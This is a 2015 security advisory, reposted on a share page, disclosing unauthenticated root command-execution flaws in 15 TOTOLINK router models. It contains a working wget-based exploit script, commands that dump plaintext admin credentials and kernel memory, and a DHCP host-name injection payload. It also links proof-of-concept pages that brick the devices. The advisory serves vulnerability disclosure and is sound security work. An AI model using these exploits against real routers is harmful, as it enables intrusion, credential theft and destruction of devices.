扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 |
## Advisory Information Title: 15 TOTOLINK router models vulnerable to multiple RCEs Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html Date published: 2015-07-16 Vendors contacted: None Release mode: 0days, Released CVE: no current CVE ## Product Description TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO markets in South Korea. TOTOLINK produces routers routers, wifi access points and network devices. Their products are sold worldwide. ## Vulnerabilities Summary The first vulnerability allows to bypass the admin authentication and to get a direct RCE from the LAN side with a single HTTP request. The second vulnerability allows to bypass the admin authentication and to get a direct RCE from the LAN side with a single DHCP request. There are direct RCEs against the routers which give a complete root access to the embedded Linux from the LAN side. The two RCEs affect 13 TOTOLINK products from 2009-era firmwares to the latest firmwares with the default configuration: - TOTOLINK A1004 : until last firmware (9.34 - za1004_en_9_34.bin) - TOTOLINK A5004NS : until last firmware (9.38 - za5004s_en_9_38.bin) - TOTOLINK EX300 : until last firmware (8.68 - TOTOLINK EX300_8_68.bin - totolink.net) - TOTOLINK EX300 : until last firmware (9.36 - ex300_ch_9_36.bin.5357c0 - totolink.cn) - TOTOLINK N150RB : until last firmware (9.08 - zn150rb_en_9_08.bin.5357c0) - TOTOLINK N300RB : until last firmware (9.26 - zn300rb_en_9_26.bin) - TOTOLINK N300RG : until last firmware (8.70 - TOTOLINK N300RG_8_70.bin) - TOTOLINK N500RDG : until last firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin) - TOTOLINK N600RD : until last firmware (8.64 - TOTOLINK N600RD_en_8_64.bin) - TOTOLINK N302R Plus V1 : until the last firmware 8.82 (TOTOLINK N302R Plus V1_en_8_82.bin) - TOTOLINK N302R Plus V2 : until the last firmware 9.08 (TOTOLINK N302R Plus V2_en_9_08.bin) - TOTOLINK A3004NS (no firmware available in totolinkusa.com but ipTIME's A3004NS model was vulnerable to the 2 RCEs) - TOTOLINK EX150 : until the last firmware (8.82 - ex150_ch_8_82.bin.5357c0) The DHCP RCE also affects 2 TOTOLINK products from 2009-era firmwares to the latest firmwares with the default configuration: - TOTOLINK A2004NS : until last firmware (9.60 - za2004s_en_9_60.bin) - TOTOLINK EX750 : until last firmware (9.60 - ex750_en_9_60.bin) Firmwares come from totolink.net and from totolink.cn. - - From my tests, it is possible to use these vulnerabilities to overwrite the firmware with a custom (backdoored) firmware. Concerning the high CVSS score (10/10) of the vulnerabilities and the longevity of this vulnerability (6+ year old), the TOTOLINK users are urged to contact TOTOLINK. ## Details - RCE with a single HTTP request The HTTP server allows the attacker to execute some CGI files. Many of them are vulnerable to a command inclusion which allows to execute commands with the http daemon user rights (root). Exploit code: $ cat totolink.carnage #!/bin/sh if [ ! $1 ]; then echo "Usage:" echo $0 ip command exit 1 fi wget -qO- --post-data="echo 'Content-type: text/plain';echo;echo;PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh The exploits have been written in HTML/JavaScript, in form of CSRF attacks, allowing people to test their systems in live using their browsers: http://pierrekim.github.io/advisories/ o Listing of the filesystem HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-listing.of.the.filesystem.html Using CLI: root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head ash auth busybox cat chmod cp d.cgi date echo false root@kali:~/totolink# o How to retrieve the credentials ? (see login and password at the end of the text file) HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-dump.configuration.including.credentials.html Using CLI: kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg wantype.wan1=dynamic dhblock.eth1=0 ppp_mtu=1454 fakedns=0 upnp=1 ppp_mtu=1454 timeserver=time.windows.com,gmt22,1,480,0 wan_ifname=eth1 auto_dns=1 dhcp_auto_detect=0 wireless_ifmode+wlan0=wlan0,0 dhcpd=0 lan_ip=192.168.1.1 lan_netmask=255.255.255.0 dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0 dhcpd_dns=164.124.101.2,168.126.63.2 dhcpd_opt=7200,30,200, dhcpd_configfile=/etc/udhcpd.conf dhcpd_lease_file=/etc/udhcpd.leases dhcpd_static_lease_file=/etc/udhcpd.static use_local_gateway=1 login=admin password=admin Login and password are stored in plaintext, which is a very bad security practice. o Current running process: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-current.process.html Using CLI: kali# ./totolink.carnage 192.168.1.1 ps -auxww o Getting the kernel memory: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-getting.kernel.memory.html Using CLI: kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore o Default firewall rules: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-default.firewall.rules.html Using CLI: kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL o Opening the management interface on the WAN: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-opening.the.firewall.html o Reboot the device: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-reboot.html o Brick the device: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-bricking.the.device.html An attacker can use the /usr/bin/wget binary located in the file system of the remote device to plant a backdoor and then execute it as root. By the way, d.cgi in /bin/ is an intentional backdoor. ## Details - RCE with a single DHCP request This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD server in TOTOLINK devices allows remote attackers to execute arbitrary commands via shell metacharacters in the host-name field. Sending a DHCP request with this parameter will reboot the device: cat /etc/dhcp/dhclient.conf send host-name ";/sbin/reboot"; When connecting to the UART port (<code>screen /dev/ttyUSB0 38400</code>), we will see the stdout of the /dev/console device; the dhcp request will immediately force the reboot of the remote device: Booting... @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize @ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h @ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName @ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16 @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ [...] WiFi Simple Config v1.12 (2009.07.31-11:35+0000). Launch iwcontrol: wlan0 Reaped 317 iwcontrol RUN OK SIGNAL -> Config Update signal progress killall: pppoe-relay: no process killed SIGNAL -> WAN ip changed WAN0 IP: 192.168.2.1 signalling START Invalid upnpd exit killall: upnpd: no process killed upnpd Restart 1 iptables: Bad rule (does a matching rule exist in that chain?) Session Garbage Collecting:Maybe system time is updated.( 946684825 0 ) Update Session timestamp and try it after 5 seconds again. ez_ipupdate callback --> time_elapsed: 0 Run DDNS by IP change:/ 192.168.2.1 Reaped 352 iptables: Bad rule (does a matching rule exist in that chain?) Jan1 00:00:25 miniupnpd[370]: Reloading rules from lease file Jan1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist Jan1 00:00:25 miniupnpd[370]: HTTP listening on port 2048 Reaped 363 Led Silent Callback Turn ON All LED Dynamic Channel Search for wlan0 is OFF start_signal => plantynet_sync Do start_signal => plantynet_sync SIGNAL -> Config Update signal progress killall: pppoe-relay: no process killed SIGNAL -> WAN ip changed Reaped 354 iptables: Bad rule (does a matching rule exist in that chain?) ez_ipupdate callback --> time_elapsed: 1 Run DDNS by IP change:/ 192.168.2.1 Burst DDNS Registration is denied: iptime -> now:26 Led Silent Callback Turn ON All LED /proc/sys/net/ipv4/tcp_syn_retries: cannot create - - - ---> Plantynet Event : 00000003 - - - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE [sending the DHCP request] [01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan1 00:01:03 miniupnpd[370]: received signal 15, good-bye Reaped 392 Reaped 318 Reaped 314 Reaped 290 Reaped 288 Reaped 268 Reaped 370 Reaped 367 - - - ---> PLANTYNET_SYNC_FREE_DEVICE Restarting system. Booting... @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize @ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h @ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName @ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16 @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Reboot Result from Watchdog Timeout! - - - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz) Delay 1 second till reset button Magic Number: raw_nv 00000000 Check Firmware(05020000) : size: 0x001ddfc8 ----> [...] An attacker can use the /usr/bin/wget binary located in the file system of the remote device to plant a backdoor and then execute it as root. ## Vendor Response Due to "un-ethical code" found in TOTOLINK products (= backdoors found in new TOTOLINK devices), TOTOLINK was not contacted in regard of this case, but ipTIME was contacted in April 2015 concerning the first RCE. ## Report Timeline * Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres in ipTIME products. * Jun 02, 2014: Second RCE found by Pierre Kim in ipTIME products. * Jun 25, 2015: Similar vulnerabilities found in TOTOLINK products. * Jul 13, 2015: TOTOLINK silently fixed the HTTP RCE in A2004NS and EX750 routers. * Jul 13, 2015: Updated firmwares confirmed vulnerable. * Jul 16, 2015: A public advisory is sent to security mailing lists. ## Credit These vulnerabilities were found by Alexandre Torres and Pierre Kim (@PierreKimSec). ## References https://pierrekim.github.io/advisories/2015-totolink-0x00.txt https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html ## Disclaimer This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/ |
体验盒子
